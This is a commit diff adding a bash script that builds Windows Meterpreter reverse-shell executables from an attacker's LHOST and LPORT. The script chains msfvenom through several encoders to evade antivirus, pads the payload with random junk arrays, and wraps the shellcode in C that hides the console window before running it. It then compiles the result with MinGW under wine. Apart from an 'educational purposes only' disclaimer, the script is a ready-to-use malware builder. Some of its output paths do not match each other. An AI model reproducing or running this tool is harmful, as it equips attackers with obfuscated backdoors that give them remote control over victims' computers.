Create custom_payload.sh

Author: MidnightSeer

custom_payload.sh

@@ -0,0 +1,99 @@
+#!/bin/bash
+#Created by Alex Williams
+#This script is for educational purposes only. I am not responsible for your ignorance/stupidity.
+#This code is simple. If you want to update it, please do. But send me a copy and also reference me as an author.
+bannr="Custom MSFVenom Executable Generator"
+clear
+echo $bannr
+checkdir="/root/.wine/drive_c/MinGW/bin"
+if [ ! -d "$checkdir" ]; then
+        echo "MinGW for Windows not found on this system. Please install it first."
+	exit
+fi
+echo
+echo "We're going to generate some shellcode!"
+echo "Be sure to take what you want out of the ShellCode folder."
+echo
+read -p "LHOST: " ip
+read -p "LPORT: " lprt
+clear
+echo $bannr
+echo
+echo "LHOST set to $ip and the LPORT is set to $lprt."
+echo
+echo "We will be using the windows/meterpreter/reverse_x payloads."
+echo "Which would you like to use?"
+read -p "windows/meterpreter/reverse_" listenr
+read -p "How many encoding iterations? " enumber
+read -p "Okay, and how many lines of 'fluff?' Do not exceed 600. " seed
+clear
+echo $bannr
+echo
+echo "Alright, so we're going to be listening on $ip:$lprt with the"
+echo "payload windows/meterpreter/reverse_$listenr. You want $enumber"
+echo "iterations of encoding with $seed lines of fluff."
+read -p "Press any key to continue..."
+#Begin generation
+directory="/home/unknown/Documents/msfpayloads/shellcode"
+if [ ! -d "$directory" ]; then
+	echo "Creating the ShellCode folder in the metasploit directory..."
+	mkdir $directory
+fi
+if test "$(ls -A "$directory")"; then
+
+	echo "Cleaning out the ShellCode directory"
+	rm $directory/*
+fi
+cd /usr/share/metasploit-framework
+echo "Generating shellcode..."
+msfvenom -p windows/meterpreter/reverse_${listenr} LHOST=$ip LPORT=$lprt EXITFUNC=process --platform windows -e generic/none -i 1 -a x86 -f raw | msfvenom -p - --platform windows -a x86 -e x86/shikata_ga_nai -i $enumber -f raw | msfvenom -p - --platform windows -a x86 -e x86/jmp_call_additive -i $enumber -f raw | msfvenom -p - --platform windows -a x86 -e x86/call4_dword_xor -i $enumber -f raw | msfvenom -p - --platform windows -a x86 -e x86/shikata_ga_nai -i $enumber -f c -o $directory/test.c
+cd /home/unknown/Documents/msfpayloads/shellcode
+echo "Shellcode generated."
+echo "Cleaning it up..."
+sed '1d' test.c > aready.c
+echo "unsigned char micro[]=" > var
+cat var > ready.c
+cat aready.c >> ready.c
+echo "Creating Headers..."
+echo "#include <stdio.h>" >> temp
+echo "#define _WIN32_WINNT 0x0500" >> temp
+echo "#include <windows.h>" >> temp
+echo 'unsigned char ufs[]=' >> temp
+echo "Creating the first bit of fluff"
+for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2
+sed -i 's/$/"/' temp2
+sed -i 's/^/"/' temp2
+echo  ';' >> temp2
+cat temp2 >> temp
+cat ready.c >> temp
+mv temp ready2.c
+echo ";" >> ready2.c
+echo "Creating the execution bit..."
+echo "int main(void) { " >> ready2.c
+echo "HWND hWnd = GetConsoleWindow();" >> ready2.c
+echo "ShowWindow( hWnd, SW_HIDE );((void (*)())micro)();}" >> ready2.c
+mv ready2.c final.c
+echo "Creating the last bit of fluff..."
+echo 'unsigned char tap[]=' > temp3
+for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4
+sed -i 's/$/"/' temp4
+sed -i 's/^/"/' temp4
+echo  ';' >> temp4
+cat temp4 >> temp3
+echo "Merging the last of it together..."
+cat temp3 >> final.c
+outdir="/root/out"
+if [ ! -d "$outdir" ]; then
+        echo "Creating the out folder in the root directory..."
+        mkdir $outdir
+fi
+cd /root/.wine/drive_c/MinGW/bin/
+wine gcc.exe -o /home/unknown/Documents/msfpayloads/out/final.exe /home/unknown/Documents/msfpayloads/shellcode/final.c -lwsock32
+cd /home/unknown/Documents/msfpayloads/out/
+mv final.exe "$listenr-$lprt-$RANDOM.exe"
+filex=`ls -ct1 | head -1`
+sumx=`sha1sum $filex`
+echo $filex "SHA-1 Checksum is .." $sumx
+strip --strip-debug $filex
+echo "Done!"
+